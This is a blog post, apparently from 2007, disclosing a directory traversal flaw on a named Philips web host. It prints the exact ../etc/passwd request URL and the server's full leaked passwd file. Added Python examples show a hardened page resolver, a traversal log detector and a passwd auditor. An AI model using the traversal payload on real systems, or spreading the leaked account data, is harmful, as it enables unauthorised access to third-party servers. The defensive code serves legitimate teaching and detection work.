Who Wants To Root Philips.

Published on: 1180388013
Writing about hacking and security isn't like anything else. It's cool and depressing, fun and dangerous at the same time. You never know what to expect. That's the beauty of it, I guess. Since application hacking is quite well known by now, it depresses me very much to encounter the things I am about to speak about.



My first directory traversal was around 1999, when I more or less found myself intrigued by web applications and was pretty stunned that I could hack Cisco from a browser instead of a terminal. Imagine that: without any GNU/Linux skills, running Netscape on some Windows box, trying to proof-root Cisco and send them my findings. And guess what, they never replied. Maybe the hole is still open after all these years, who knows. It's fair to conclude that programmers still suck at security and it's not likely to change any time soon. But the biggest problem for hackers or security pentesters is the way they have to contact a company to notify them of their security issues. To be honest, I never got an honest mail back from anyone, only a couple of threats. One of them was Bank Of America, who pulled the plug on this very website. But I guess that comes with the territory. In the real world everyone would be happy if their neighbors notified them that they had left their house keys on the outside of the front door. But no, not in Internet land.



A reader called haykuro contacted me one month ago about a gaping hole on the Philips domain: a classic directory traversal vulnerability. As if that wasn't enough, I tried to be an upstanding citizen and contacted Philips, which turns out to be virtually impossible. They seem to have really good human resource firewalls, but lack proper application firewalls. They never got back to me, even when I said that I would disclose it on the net. So, one month later, and it's still not fixed. I took a couple of hours to write mails back and forth, all in vain. Now I have only one thing to say: go suck on it!



Directory traversal:

http://www.trimension.philips.com/index.php?page=../../../../../../etc/passwd
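The request above is the textbook shape of the bug: a `page` parameter that the script joins straight into a filesystem path, so `..` segments walk out of the intended directory and the script returns whatever the web server's user can read. The following Python is an added example, not code from the post or from the Philips site (whose source is not known). It contrasts the vulnerable resolution with a hardened one (fixed allowlist of page names, server-side extension, containment check against the base directory) and adds a small detector that flags traversal attempts in web server access logs, including double-encoded ones. `PAGES_DIR`, `ALLOWED_PAGES` and the log lines in `SAMPLE_LOG` are assumptions constructed for the example.

```python
import re
import posixpath
from urllib.parse import urlsplit, parse_qs, unquote

# Hypothetical layout of the application: the files that index.php?page=...
# may include live under PAGES_DIR and are named in ALLOWED_PAGES.
PAGES_DIR = "/var/www/html/pages"
ALLOWED_PAGES = {"home", "products", "contact"}


def resolve_page_unsafe(page):
    """The vulnerable pattern: the request parameter is joined straight into a
    filesystem path, so '..' segments walk out of PAGES_DIR."""
    return posixpath.normpath(posixpath.join(PAGES_DIR, page))


def resolve_page_safe(page):
    """Hardened version: only names from a fixed allowlist are accepted, the
    extension is appended server-side, and the normalised path is checked to
    still lie inside PAGES_DIR. Returns None when the request is rejected."""
    if page not in ALLOWED_PAGES:
        return None
    candidate = posixpath.normpath(posixpath.join(PAGES_DIR, page + ".php"))
    # Defence in depth: even an allowlisted name must resolve inside PAGES_DIR.
    if posixpath.commonpath([PAGES_DIR, candidate]) != PAGES_DIR:
        return None
    return candidate


def looks_like_traversal(request_target):
    """Detection helper: True when any query value, after URL decoding (twice,
    to catch double encoding), contains a '..' path segment or an absolute path."""
    query = urlsplit(request_target).query
    for values in parse_qs(query, keep_blank_values=True).values():
        for value in values:
            decoded = unquote(value)  # parse_qs already decoded once
            segments = decoded.replace("\\", "/").split("/")
            if ".." in segments or decoded.startswith("/"):
                return True
    return False


# Request line inside a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def scan_access_log(lines):
    """Return (client, target) pairs for log lines whose request looks like traversal."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = m.group(1)
        if looks_like_traversal(target):
            hits.append((line.split()[0], target))
    return hits


# Constructed sample log lines (not from the page). The first mirrors the request
# shown in the post, the second is benign, the third is the same attempt
# double-encoded so that a naive single decode would miss it.
SAMPLE_LOG = [
    '203.0.113.5 - - [28/May/2007:10:00:01 +0200] "GET /index.php?page=../../../../../../etc/passwd HTTP/1.1" 200 2104',
    '198.51.100.7 - - [28/May/2007:10:00:02 +0200] "GET /index.php?page=home HTTP/1.1" 200 5120',
    '203.0.113.5 - - [28/May/2007:10:00:03 +0200] "GET /index.php?page=..%252F..%252Fetc%252Fpasswd HTTP/1.1" 200 2104',
]

if __name__ == "__main__":
    print(resolve_page_unsafe("../../../../../../etc/passwd"))  # /etc/passwd
    print(resolve_page_safe("../../../../../../etc/passwd"))    # None
    print(resolve_page_safe("home"))                             # /var/www/html/pages/home.php
    for client, target in scan_access_log(SAMPLE_LOG):
        print("traversal attempt from", client, "->", target)
```

The allowlist is what actually closes the hole; the `commonpath` check is there so that a later change to how the path is built (say, accepting subdirectories) still cannot escape the base directory. The log scanner is deliberately simple: it only looks at query values, so it complements rather than replaces a proper WAF rule set.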


Notice that the passwords are shadowed. At least they got that right. A shadowed password is indicated by an x in the second field. This means that the password hashes aren't visible in the passwd file but reside in the shadow file. Nonetheless, you can obtain any file you want.



passwd file:



root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
ident:x:100:101::/home/ident:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/bin/false
ntp:x:38:38::/etc/ntp:/sbin/nologin
administrator:x:201:201::/home/administrator:/bin/bash
fhsvct:x:203:203::/home/fhsvcs:/bin/false
webstats:x:250:250::/var/ossec:/sbin/nologin
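Reading a dump like the one above by hand is error-prone, so here is an added example (not from the post) of a small passwd(5) parser and audit in Python. It classifies the second field (x for shadowed, empty, locked, or a hash sitting in the world-readable file), lists UID 0 accounts, and lists accounts that can still log in. One point the audit makes explicit: an empty shell field, as in the news entry above, is not "no shell"; the system substitutes /bin/sh, so such accounts are counted as login-capable. `SAMPLE_PASSWD` takes seven entries from the dump on this page plus one constructed `guest` line with an empty password field to exercise that check.

```python
# Shells that refuse interactive login. Anything else (including an empty
# field, which defaults to /bin/sh) is treated as login-capable.
NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false", "/usr/bin/false"}


def parse_passwd(text):
    """Parse passwd(5) text into a list of dicts, one per account."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 colon-separated fields, got {len(fields)}")
        name, password, uid, gid, gecos, home, shell = fields
        entries.append({
            "name": name, "password": password, "uid": int(uid), "gid": int(gid),
            "gecos": gecos, "home": home, "shell": shell,
        })
    return entries


def password_state(field):
    """Classify the second passwd field."""
    if field == "x":
        return "shadowed"        # real hash lives in /etc/shadow
    if field == "":
        return "empty"           # no password at all
    if field[0] in "*!":
        return "locked"          # password authentication disabled
    return "hash-in-passwd"      # hash exposed in the world-readable file


def audit_passwd(text):
    """Return the findings a reviewer would want from a passwd dump."""
    entries = parse_passwd(text)
    return {
        "not_shadowed": [e["name"] for e in entries
                         if password_state(e["password"]) in ("empty", "hash-in-passwd")],
        "uid0": [e["name"] for e in entries if e["uid"] == 0],
        "login_capable": [e["name"] for e in entries if e["shell"] not in NOLOGIN_SHELLS],
    }


# Seven entries copied from the dump on this page, plus one constructed line
# (guest) with an empty password field that is NOT from the page.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
news:x:9:13:news:/etc/news:
nobody:x:99:99:Nobody:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
apache:x:48:48:Apache:/var/www:/bin/false
administrator:x:201:201::/home/administrator:/bin/bash
guest::500:500:constructed example:/home/guest:/bin/bash
"""

if __name__ == "__main__":
    for key, names in audit_passwd(SAMPLE_PASSWD).items():
        print(f"{key}: {', '.join(names) or '-'}")
```

On the page's dump every password field is x, so `not_shadowed` is empty for the real data; the interesting output is `login_capable`, which besides root surfaces netdump and administrator with /bin/bash and news with the implicit default shell.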